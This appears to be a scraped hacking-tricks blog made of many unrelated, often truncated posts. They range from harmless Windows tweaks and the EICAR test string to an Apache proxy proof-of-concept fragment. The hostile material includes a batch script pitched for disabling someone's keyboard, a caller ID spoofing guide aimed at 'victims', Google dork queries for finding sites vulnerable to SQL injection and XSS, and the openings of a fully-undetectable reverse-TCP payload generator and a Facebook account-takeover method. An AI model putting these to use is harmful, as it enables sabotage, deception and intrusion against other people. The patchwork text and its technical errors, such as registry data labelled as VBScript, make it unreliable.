Is your Antivirus properly? Learn how to check its funcationality.

Is your antivirus program working properly? Ever wondered how to check the functionality of your antivirus. Well below described is an easy way to check your antivirus. The process is called EICAR test which works on any antivirus program. It is developed by European Institute of Computer Antivirus Research .This process can be used by Antivirus programmers to test the working of their antivirus program. To test your antivirus follow the steps given below-

Open Notepad and copy paste the following code:-
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*



Now save it as my file.com
If the antivirus installed on your computer is working properly a message must be displayed by your antivirus saying that the file is a virus, and the file  should deleted immediatly, which means your antivirus is working properly. If in case your antivirus program doesn't detect it as a virus, you must change your antivirus program.

Adding more options in right click Content Menu of My Computer

I will be using Visual Basic Script (Vbs) to modify the right click context of my computer. Copy the following of code in your favorite text editor (e.g. Notepad++) and save it as anything.vbs. The extension .vbs must be there after you have named you script to make your script work.


*********Code starts from here***********

; Add Control Panel to Right Click Menu of My Computer
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\Control Panel\command]
@="rundll32.exe shell32.dll,Control_RunDLL"


; Add Add/Remove Programs to Right Click Menu of My Computer
[HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\Add/Remove Programs\command]
@="control appwiz.cpl"


; Add Device Manager to Right Click Menu of My Computer
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\Device Manager\command]
@="mmc.exe %%SYSTEMDRIVE%%\\WINDOWS\\SYSTEM32\\devmgmt.msc"


; Add Registry Editor to Right Click Menu of My Computer
[HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\Registry Editor\command]
@="Regedit.exe"


; Add Services to Right Click Menu of My Computer
[HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\Services]
@=hex(2):53,00,65,00,72,00,76,00,69,00,63,00,65,00,73,00,00,00
"SuppressionPolicy"=dword:4000003c
[HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\Services\command]
@=hex(2):25,00,77,00,69,00,6e,00,64,00,69,00,72,00,25,00,5c,00,73,00,79,00,73, 00,74,00,65,00,6d,00,33,00,32,00,5c,00,6d,00,6d,00,63,00,2e,00,65,00,78,00, 65,00,20,00,2f,00,73,00,20,00,25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52, 00,6f,00,6f,00,74,00,25,00,5c,00,73,00,79,00,73,00,74,00,65,00,6d,00,33,00, 32,00,5c,00,73,00,65,00,72,00,76,00,69,00,63,00,65,00,73,00,2e,00,6d,00,73, 00,63,00,20,00,2f,00,73,00,00,00


; Add LogOff to Right Click Menu of My Computer
[HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\[Logoff]\command]
@="shutdown -l -f -t 5"


; Add Reboot to Right Click Menu of My Computer
[HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\[Reboot]\command]
@="shutdown -r -f -t 5"


; Add Shutdown to Right Click Menu of My Computer
[HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\[Shutdown]\command]
@="shutdown -r -f -t 5"


; Add Microsoft Configurator to Right Click Menu of My Computer
[HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\Microsoft Configurator\command]
@="msconfig.exe"


; Add Sound And Audio Devices to Right Click Menu of My Computer
[HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\Sound And Audio Devices\command]
@="control mmsys.cpl"


; Add Internet Properties to Right Click Menu of My Computer
[HKEY_CLASSES_ROOT\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\shell\Internet Properties\command]
@="control inetcpl.cpl"


*********Code ends here**************

Apache HTTP Server Reverse Proxy/Rewrite URL Validation Issue By Qualys

Proof of Concepts


Target:
Fully patched Apache Web Server (Version 2.2.21) with CVE-2011-3368
patch applied, with a reverse proxy set up and incorrectly configured
RewriteRule/ProxyPassMatch rules.


Rewrite rules in httpd.conf:
RewriteRule ^(.*) http://10.40.2.159$1
ProxyPassMatch ^(.*) http://10.40.2.159$1



Example 1:
GET @localhost:: HTTP/1.0\r\n\r\nwhere is any port

Google Search With Effectively

Source: http://mashable.com/2011/11/24/google-search-infographic/

If you like my blog, Please Donate Me




One Dollar $1.00 Two Dollar $2.00 Three Dollar $3.00

WEP Cracking Cheatsheet From Wicky.ws

I’m using an ALFA AWUS036H connected to a Acer Aspire One D255
running BackTrack 5. The first thing I’ve found with this set up is that
the rtl8187 kernel module seems to conflict with the iwlagn Intel
wireless driver, so I just remove the Intel one while I’m using the
ALFA.

# rmmod iwlagn

Then plug in the ALFA. You should see something like the following in /var/log/messages:


Nov 25

Enabling God Mode in Windows 7.

In this post I will show you how you can enable God Mode on your windows 7 machine.
Which will bring all the windows setting under one hood without needing to browse options and folders in the Control Panel. The term “GOD MODE” is given by Microsoft Development Team.
Follow the steps described below-

1.Create a new folder.
2.Rename the folder to GodMode.{ED7BA470-8E54-465E-825C-99712043E01C}  (you          can change the name GodMode to any name as you wish but remember not to change the text after GodMode.
3.The icon of your folder will change. Double click on it to open the GOD MODE window.

Caller ID Spoofing:Display any number when you call your friend.

In this post I will be showing you guys how to do Caller ID Spoofing. It is basically a trick in which you can display any mobile number of your choice on your victims mobile when you call him. For performing this simple trick there is a very cool website called CrazyCall.

When you will visit this website, it will ask you for the country you are currently in, the mobile number you want to display on your victims mobile and the mobile number you want to call. After filling all the fields, Click on Get Me The Code Button. You will be given a phone number with the secret code. Call the number you are given and follow the instructions. This service can also be used as an Voice Changer.

Think You're Anonymous? Google Analytics May Prove Different

How He Did It


You'd think that this would take some serious sleuthing
techniques right? Well, thinking of tracking bloggers using their GA
code seems some hoopy thinking – but the method isn't hard.


Basically, Baio plugged the anonymous domains into eWhois:




Using a sample of 50 anonymous blogs pulled from discussion
forums and Google news, only 14 were using Google Analytics,

9 Indian Education based sites hacked and defaced by ZHC Unknown and ZHC Dropper Gen.

The Cyber NewZ || Get All The News About The Cyber World || The Cyber News: 9 Indian Education based sites hacked and defaced by ZHC Unknown and ZHC Dropper Gen.

Ethical Hacking Tutorials | How to Hack | Hacking Tricks: Self-XSS (Cross Site Scripting) ~ Social Engineering Attack and Prevention

Ethical Hacking Tutorials | How to Hack | Hacking Tricks: Self-XSS (Cross Site Scripting) ~ Social Engineering Attack and Prevention

Learn Hacking: 5 Things Every Beginner Hacker Should Know

Learn Hacking: 5 Things Every Beginner Hacker Should Know

Jailbreak 5.0.1 For iPad, iPod Touch, iPhone

1. Download the latest version of Redsn0w (0.9.9b8) for Windows or Mac.

2. Run Redsn0w and select "Extras".

3. Click on "Select IPSW", browse to where your iOS 5 firmware is and select appropriate firmware file for your iDevice.

4. Go back and then hit "Jailbreak".

5. Select "Install Cydia", hit "Next" to put your device in DFU mode and then Redsn0w will apply the jailbreak.

6. After

Howto: How to downgrade 5.0.1 to 4.3.3 / 4.3.5 - iPhone 4, 3GS, iPod Touch 4G, 3G, iPad:

Step 1: Make sure that you have downloaded the version of iOS
which you gonna downgrade to (4.3.5, 4.3.3 or any iOS version), you can
download any iOS firmware from our library - Click Here.

Step 2: Navigate to :
Windows Users: Windows > System 32 > drivers > etc
Mac Users : etc

Open hosts file with the text editor then add the following code to the end of the file :

74.208.105.171

Preventing User from using almost all features of Windows.

In this trick we are going to learn how we can put restriction on almost everything that Windows offer us. Sometimes it also becomes necessary for system administrators from restricting users to use certain windows applications.

The easiest way for imposing restrictions on user is described below-

1.Open Registry Editor

2.Scroll down to the following registry key-

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

3.Under this, one can create number of keys which can impose interesting restrictions on the users. Below are the DWORD values one can create.

• NoDeletePrinter-This can be use to put restrictions on already installed printers. Data value 1 means installed printer cannot be deleted whereas data value 2 means it can be deleted
• NoAddPrinter-It is quit similar as previous restriction. It puts restrictions on user to add a new printer.
• NoRun-This DWORD value can be used to either disable the run box or to enable it. Data value 1 disable the run box whereas data value 0 enables it back. 
• NoFind-This DWORD value is used to either hide or show the find option generally present in start menu. Data Value 1 hides it whereas data value 0 shows it.
• NoDrives-This DWORD value is used to hide all your hard drives present in my computer. The data value 1 hides all the drives whereas data value 0 show the back. 
• NoNetHood-This DWORD value is used to hide Network Neighborhood icon from the desktop. Data Value 1 hides the icon whereas data value 0 shows the icon back on desktop.
• NoInternetIcon-This DWORD value is used to hide Internet Explore icon from the desktop. Data value 1 is used to hide the icon whereas data value 2 is used to bring back the icon on the desktop.
• NoCommonGroup-This DWORD value is used to hide Common Group folder. Data value 1 is used to hide the folder whereas data value 0 shows the folder back.
• NoRecentDocsHistory-In windows whenever a document or a file is being opened it is automatically added to Recent Document History. This value can be used to prevent this. If the data value is 1 recent document will not be added to the list whereas if the data value is 0 the recent document will be added to the list.
• ClearRecentDocsonExit-This DWORD value is used to automatically clear the Recent Document History. Data value 1 enables it whereas data value  2 disables it.
• NoFavrouiteMenu-This DWORD value is used to enable or disable Favorite Menu option. Data value on 1 disables it whereas data value 0 enables it back.
• NoNetworkConnection-This DWORD value is used to hide or show Network and Dial-up Connection option. Data value 1 hides the option whereas data value 0 shows the option back.
• NoSMHelp-This DWORD value is used to hide or show Windows Help option. Data value 1 is used to hide the option whereas data value 0 is used to show the option back
• NoSMMyDocs-This DWORD value is used to hide or show My Document folder. Data value 1 is used to hide the folder whereas data value 0 is used to show the folder back
• NoSMMYPictures-This DWORD value is used to hide or show My Pictures folder. Data value 1 is used to hide the folder whereas data value 0 is used to show the folder back.
• NoStartMenuMyMusic-This DWORD value is used to hide or show My Music folder. Data value 1 is used to hide the folder whereas data value 0 is used to show the folder back.
• NoToolBarOnTaskbar-This DWORD value is used to hide or show the Toolbars created by the user. Data value 1 hide the toolbar whereas data value 0 is used to show the toolbar back.
• NoTrayItemDisplay-This DWORD value is used to hide or show the application icons which are present near the system clock. Data value 1 is used to hide those icon whereas data value 0 is used to show the application back.
• HideClock-This DWORD value is used to hide or display System Clock. Data value 1 is used to hide the system clock whereas data value 0 is used to show the system clock back
• NoSetFolders-This DWORD value is used to hide or show Setting Folder option. Data value 1 is used to hide it whereas data  value 0 is used to display it back.
• NoDesktop-This DWORD value is used to hide or show all the icons (including system folders etc.) on the desktop. Data value 1 is used to hide all the icons whereas data value 0 is used to display all the icons back.
• NoClose-This DWORD value is used to hide or show Shutdown Button. Data value 1 is used to hide the shutdown button whereas data value 0 is used the bring back shutdown button.
• NoSaveSetting-This DWORD value is used to prevent the Desktop Settings from being changed. Data value 1 is used to enable it whereas data value 0 is used to disable it.
• DisableRegistryTools-This DWORD value is used to enable or disable Windows Registry Editor. Data value 1 is used to disable registry editor whereas data value 0 is used to enable the registry editor back.

Denial of Service(DoS) Attack-Explained

Denial of Service attack or simply DoS attack is kind of a attack in which attacker is able to consume so much memory of the target system, as a result it cannot serve the legiminate user, or it causes the target system crash or reboot. Nowadays DoS attack are considered very deadly due to their after attack impact.

There are many types of DoS attacks, the most popular of which are described below:

• Smuf attacks
• SYN-flood attacks
• Land attack
• UDP-flood attack

Smuf Attacks

Smuf attack is kind of a brute-force DoS attack in which hude amount of ping request are sent to the target computer from spoofed IP address, which hooks up the resource of the target computer resulting in a crash or reboot

SYN-Flooder Attack

This is one of the most easiest DoS attach which can be executed on the target system. In this kind of a attack the target system is flooded with full connection request from spoofed IP address. As target system tries to establish a full connection with all the connection request via Three-Way-Handshake, as a result all system resources are utilized resulting in a crash or reboot.This is because when the attacker requests for the connection to the target it sends a SYN packet from the spoofed IP source, to complete the connection target sends SYN/ACK packet to spoofed IP address and waits to recieve a ACK packet in order to complete the connection consuming some memory. When huge amount of connection request are send to the target from spoofed source, all the resources are consumed.

Land Attack
This kind of DoS attack is simliar to SYN-flooder attack the only difference is that instead of sending connection request from spoofed source it sends the connection request from target computer's IP address.


UDP-Flood Attacks
This DoS attack basically exploits target system's echo service to create infinite loops bewteen two or more of UDP services.
Wikipedia explain UDP-Flood attack as:

A UDP flood attack is a denial-of-service (DoS) attack using the User Datagram Protocol (UDP), a stateless computer networking protocol.

Using UDP for denial-of-service attacks is not as straightforward as with the Transmission Control Protocol (TCP). However, a UDP flood attack can be initiated by sending a large number of UDP packets to random ports on a remote host. As a result, the distant host will:

• Check for the application listening at that port;
• See that no application listens at that port;
• Reply with an ICMP Destination Unreachable packet.

Thus, for a large number of UDP packets, the victimized system will be forced into sending many ICMP packets, eventually leading it to be unreachable by other clients. The IP address of outgoing packets may also be spoofed, ensuring that the excessive ICMP return packets do not reach the attacker, simultaneously making it harder to determine the source of the attack.

This attack can be managed by deploying firewalls at key points in a network to filter out unwanted network traffic. The potential victim never receives and never responds to the malicious UDP packets because the firewall stops them.

Traceroute-like HTTP scanner

If you want the script and the detail and example of this topic, please go to the Source.



During some recent pentests, I used the "Max-Forwards" trick to
identify some "hidden" reverse HTTP proxies. My customers were
surprised by the information found and asked me a copy of the tool.
I then choose to take some time to polish and release it. Btw,
thanks to Julien Cayssol for the initial

Disable Keyboard Using Batch Script.

In this post I will be showing you how you can disable someones keyboard using the below mentioned Batch Script. Just copy and paste the following codes in notepad and save it anything.bat


@echo off
echo Windows Registry Editor Version 5.00 > "nokeyboard.reg"
echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Keyboard Layout] >> "nokeyboard.reg"
echo "Scancode Map"=hex:00,00,00,00,00,00,00,00,7c,00,00,00,00,00,01,00,00,\ >> "nokeyboard.reg"
echo 00,3b,00,00,00,3c,00,00,00,3d,00,00,00,3e,00,00,00,3f,00,00,00,40,00,00,00,\ >> "nokeyboard.reg"
echo 41,00,00,00,42,00,00,00,43,00,00,00,44,00,00,00,57,00,00,00,58,00,00,00,37,\ >> "nokeyboard.reg"

echo e0,00,00,46,00,00,00,45,00,00,00,35,e0,00,00,37,00,00,00,4a,00,00,00,47,00,\ >> "nokeyboard.reg"
echo 00,00,48,00,00,00,49,00,00,00,4b,00,00,00,4c,00,00,00,4d,00,00,00,4e,00,00,\ >> "nokeyboard.reg"
echo 00,4f,00,00,00,50,00,00,00,51,00,00,00,1c,e0,00,00,53,00,00,00,52,00,00,00,\ >> "nokeyboard.reg"
echo 4d,e0,00,00,50,e0,00,00,4b,e0,00,00,48,e0,00,00,52,e0,00,00,47,e0,00,00,49,\ >> "nokeyboard.reg"
echo e0,00,00,53,e0,00,00,4f,e0,00,00,51,e0,00,00,29,00,00,00,02,00,00,00,03,00,\ >> "nokeyboard.reg"
echo 00,00,04,00,00,00,05,00,00,00,06,00,00,00,07,00,00,00,08,00,00,00,09,00,00,\ >> "nokeyboard.reg"
echo 00,0a,00,00,00,0b,00,00,00,0c,00,00,00,0d,00,00,00,0e,00,00,00,0f,00,00,00,\ >> "nokeyboard.reg"
echo 10,00,00,00,11,00,00,00,12,00,00,00,13,00,00,00,14,00,00,00,15,00,00,00,16,\ >> "nokeyboard.reg"
echo 00,00,00,17,00,00,00,18,00,00,00,19,00,00,00,1a,00,00,00,1b,00,00,00,2b,00,\ >> "nokeyboard.reg"
echo 00,00,3a,00,00,00,1e,00,00,00,1f,00,00,00,20,00,00,00,21,00,00,00,22,00,00,\ >> "nokeyboard.reg"
echo 00,23,00,00,00,24,00,00,00,25,00,00,00,26,00,00,00,27,00,00,00,28,00,00,00,\ >> "nokeyboard.reg"
echo 1c,00,00,00,2a,00,00,00,2c,00,00,00,2d,00,00,00,2e,00,00,00,2f,00,00,00,30,\ >> "nokeyboard.reg"
echo 00,00,00,31,00,00,00,32,00,00,00,33,00,00,00,34,00,00,00,35,00,00,00,36,00,\ >> "nokeyboard.reg"
echo 00,00,1d,00,00,00,5b,e0,00,00,38,00,00,00,39,00,00,00,38,e0,00,00,5c,e0,00,\ >> "nokeyboard.reg"
echo 00,5d,e0,00,00,1d,e0,00,00,5f,e0,00,00,5e,e0,00,00,22,e0,00,00,24,e0,00,00,\ >> "nokeyboard.reg"
echo 10,e0,00,00,19,e0,00,00,30,e0,00,00,2e,e0,00,00,2c,e0,00,00,20,e0,00,00,6a,\ >> "nokeyboard.reg"
echo e0,00,00,69,e0,00,00,68,e0,00,00,67,e0,00,00,42,e0,00,00,6c,e0,00,00,6d,e0,\ >> "nokeyboard.reg"
echo 00,00,66,e0,00,00,6b,e0,00,00,21,e0,00,00,00,00 >> "nokeyboard.reg"
start nokeyboard.reg


By running the above mentioned script all the keys on the keyboard will be disabled.


Enable the Keyboard again:-
To bring the keyboard back to its normal state goto
Start>Run and type REGEDIT.MSC. This will bring up Windows Registry Editor. In  the left pane navigate to the following key-
HKEY_LOCAL_MACHINE\System\ControlSet001\Control\Keyboard Layout, and delete "Scan Code MapKey" present in the right pane.

How to Trace Mobile Numbers.

Due to the ever increasing popularity of mobile phones, no. of illegal and criminal activities have also increased. In some cases tracing mobile numbers plays an important role in investigation purpose. Some times it also becomes necessary to trace mobile numbers to find from where prank and annoying phone calls are coming. It is not possible to trace the mobile number back to his caller. It is possible to find the location of the caller and the operators name.

If you want a simple interface which asks you to enter to mobile number you want to trace you can use International Numbering Plans.

By visiting the above mentioned link you can only get the location of the caller and the operators name. 

Accessing the blocked websites.

Nowadays, almost all modern antivirus programs are having an inbuilt feature to block websites which restricts the user from opening those blocked websites. Mostly in school, collages  and universities social networking websites like Facebook and Twitter are blocked so student may only concentrate on their study material and nothing else.In this post I will show you how you can access websites which are blocked.

Using Proxy Servers

Proxy Servers acts as a buffer bewteen you the remote host with whom you are connected. When you use a proxy server, you connection with the remote host is not directly established. Firstly the connection is established with the proxy server, then proxy server connect you to the remote host.

In order to access the blocked websites you can use Online Web Proxy. There are thousands of free online web proxy to surf the blocked websites and remain anonymous.

My personal favrouite online web proxy are-

1. Bind2

2. Free Web Proxy

You can go to the above mentioned sites, On the bottom of the page there will be a box asking you to enter the URL of the website which you want to surf. Enter the URL and hit Start or GO button. The blocked website will appear on your screen.

Setting Screen Saver as Desktop background.

This is one of my favorite tricks in which you can set almost any screen saver as your desktop background. This trick can help you for your Presentation purposes etc.So follow the simple steps below-

Open Command Prompt by going to Start|Run|cmd.exe.

1. Now type cd c:\windows\system32 (this will change the current directory to System32 folder where all screen savers are stored)

2. Type dir /s .scr (this will give you the list of all the screen savers present in the directory)

3. Suppose you want to set ribbons.scr as you desktop background type ribbons.scr /p65552 and hit enter. Screen Saver appears immediately as an eye catching desktop. The bad part is that all the desktop icons disappear and you can't move your mouse over the screen. To bring back your original wallpaper press ALT+CTRL+DEl and click on the process name same as your screen saver background and click on end task button.

If the above mentioned commands are hard and lengthy for you, you can use my batch script to carry out the same task with typing the commands. Just copy the script in notepad and save it anything.bat.Rembember that the file extension should be .bat

NOTE-The following script only works on WINDOWS 7.

@echo off

title ScreenSaVer as BackgrOund

:Main

echo                      **************************************

Echo                      **************************************

Echo                      **************************************

Echo.                      

Echo                     __Welcome to ScreenSaVer as BackgrOund__

Echo.                    

Echo                      **************************************

Echo                      **************************************

Echo                      **************************************

Echo.

Echo -------------------------------------------------------------------------------

Echo.

Echo Select the ScreeSaver you want as your desktop background.

Echo.

echo 1.Bubbles

Echo 2.Mystify

Echo 3.Ribbons

Echo.

Echo -------------------------------------------------------------------------------

set /p input=YoUr Ch0ice:

IF  %INPUT%==bubbles goto Bubbles

if %input%==ribbons goto Ribbons

if %input%== mystify goto Mystify

:Ribbons

cd C:\windows\system32

ribbons.scr /p65552

cls

Goto Main

:Mystify

cd C:\windows\system32

mystify.scr /p65552

cls

Goto Main

:bubbles

cd c:\windows\system32\

bubbles.scr /p65552

cls

Goto Main

IP SPOOFING:What exactly it is all about.

IP spoofing is one of the most complicated and advanced trick that
can be executed on a remote computer.IP spoofing happens when the attacker tricks the target computer into beliving that the packet sent to them comes from the source other than the actual source computer.In other words you can say that it is the process by which an attacker can conceal his/her real identity while attacking the system and make the target computer belive that the data packet sent to them originates at another system.

For Example, say your IP address is 127.15.18.1 and the IP address of the target system is 203.87.13.6. Normally when send a message to the target system it detects the IP address of the attackers system from which the message comes.In the case of IP spoofing attacker real IP address(in this case 127.15.18.1)is replaced with a fake ip address, making it difficult for the target computer to trace the attacker back. 

Lets take another example, imagine the following three ip address exist:
Attacker: 123.44.77.89 (real)
Victim: 44.55.66.77
Fake: 99.99.99.99

Now if real wants to send a data packet to VICTIM's system,the IP address of the attacker will be clearly show that the real has sent the data packet,therefore with the help of IP spoofing the real will send a data packet to the victim in such a way that it will appear that the data packet has came from FAKE system.As you see IP spoofing is used to disguise or hide the source IP of the attacker.

How IP SPOOFING Works-
The reason IP spoofing is regarded as a difficult attack to perform is a fact that it is a blind attack,which means if you use ip spoofing to attack a computer you receive no feedback or response saying that your attack was successful,and if the attack was unsuccessful,
what was the reason behind it.This is because the target computer send the message to the spoofed IP address i.e fake IP rather than your own.

Lets continue with the previous example. The source system(REAL) establishes a Three-Way-Handshake connection by sending a SYN packet containing the fake source IP address (FAKE) to the target (VICTIM).Victim replies by sending a SYN/ACK packet,rather sending it to real it send it to FAKE. In order to complete the three-way-handshake Victim must receive an ACK packet because VICTIM sent the SYN/ACK packet to the spoofed IP address REAL does not send a ACK packet (which was containing the fake ip address) in reply. To prevent the VICTIM to timing out the connection REAL must bluff by sending an ACK packet acknowledging that the SYN/ACK packet was recevied by FAKE.If the third step completes successfully a three-way-handshake bewteen VICTIM and FAKE completes.

GOOGLE DORKS:Learn how to use Google for Hacking.

Ever wondered GOOGLE the world's most popular and powerful search engine can be used for malicious purposes. Google has the ability to accept pre-defined commands as input and produce unbeliviable results which enables hackers,crackers, and script kiddies etc to use Google search engine to gather confidential or sensitive information which are not visible  through common searches. You can find websites vulnerable to SQL Injection, XSS attacks etc.

Google’s Advance Search Query Syntaxes-

Below disscused are various google special commands which can be used to dig some critical juicy information.

[inurl:]

The [inurl:] syntax restricts the search result to those  URLs containing the search keyword.“inurl: admin” (without quotes) will return only links to those pages that have "admin" in the URL.

[intitle:]

the [intitle:] syntax restricts the search result to the pages containing the word inside.for example "intitle: administrator password" (without quotes)will give the link to all the pages which are having Administrator as their title and the word "password" anywhere in the page.

[Link:]

Link syntax will give the pages that have the link to a specified webpage.For example,"link:www.google.com" (without quotes) will list web pages that have link pointing to Google's homepage.

[releated:]

The releated syntax will give you the webpages which are similar to a specified webpage.for example,"releated:www.google.com" will list the webpages that are similar to Google's homepage.

[phonebook:]

"phonebook"searches for US phone number information.for exampe "phonebook:jack+LA will list down all the name which are having JACK in their name and lives in Los Angeles(LA).

[ filetype: ]

Using "filetype:" syntax google searches for a particlur file type(i.e .doc, .exe etc.)for example, “filetype:txt site:gov top secret”(without quotes) will look for the file type ".txt" extension in all the government domains with .gov extension and containing the word top secret either in the page or in the .txt file.

Looking for vulnerable sites or servers using “intitle:” or “allintitle:”

a.)Using [allintitle: "index of /root”] (without brackets) will give you the links to the web servers which give you the access to the restricted directories like "root" through web.

b.)Using [allintitle: "index of /admin”] (without brackets) will give you the links to the websites which have indexed browsing enabled for restricted directories like "admin".

Other interesting Search Queries

To search for sites vulnerable to Cross-Sites Scripting (XSS) attacks:

allinurl:/scripts/cart32.exe

allinurl:/CuteNews/show_archives.php

allinurl:/phpinfo.php

To search for sites vulnerable to SQL Injection attacks:

allinurl:/privmsg.php

inurl:trainers.php?id=

inurl:play_old.php?id=

FUD Payload Generator for Backtrack By Coresec.org

Today based on Astr0baby’s article on how can we create a fully undetectable metasploit payload, i modified his REVERSE_TCP Payload Generator in order to work with Backtrack 5 distro. Below you can find the modified version and a simple presentation on how it works:



#!/bin/bash
echo "************************************************************"
echo " Automatic

MS11-083 Details And Honeypot.

Microsoft Security Bulletin MS11-083 - Critical


Vulnerability in TCP/IP Could Allow Remote Code Execution (2588516)


Executive Summary
This
security update resolves a privately reported vulnerability in
Microsoft Windows. The vulnerability could allow remote code execution
if an attacker sends a continuous flow of specially crafted UDP packets
to a closed port on a target system.

The

Creating executable of Shell Script

By
Nikesh Jauhari










Many times it happen that shell scripts that we write contains sensitive
information like password or some sort of keys or path to some
sensitive files and if you running such script it become very easy for
the normal user to have a look inside the script and get the sensitive
information from the code.
There is a program called "shc" which can provide the

Exploiting “Facebook Trusted Friend” Security Feature

In Facebook’s case, the keys are codes, and the user can choose from three to five “Trusted friends”
who are then provided with a code. If you ever get locked out of your
account (and you can’t access your email to follow the link after
resetting your Facebook password), you gather all the codes and use them
to gain access to it again.  This method is used by hackers to hack
most of the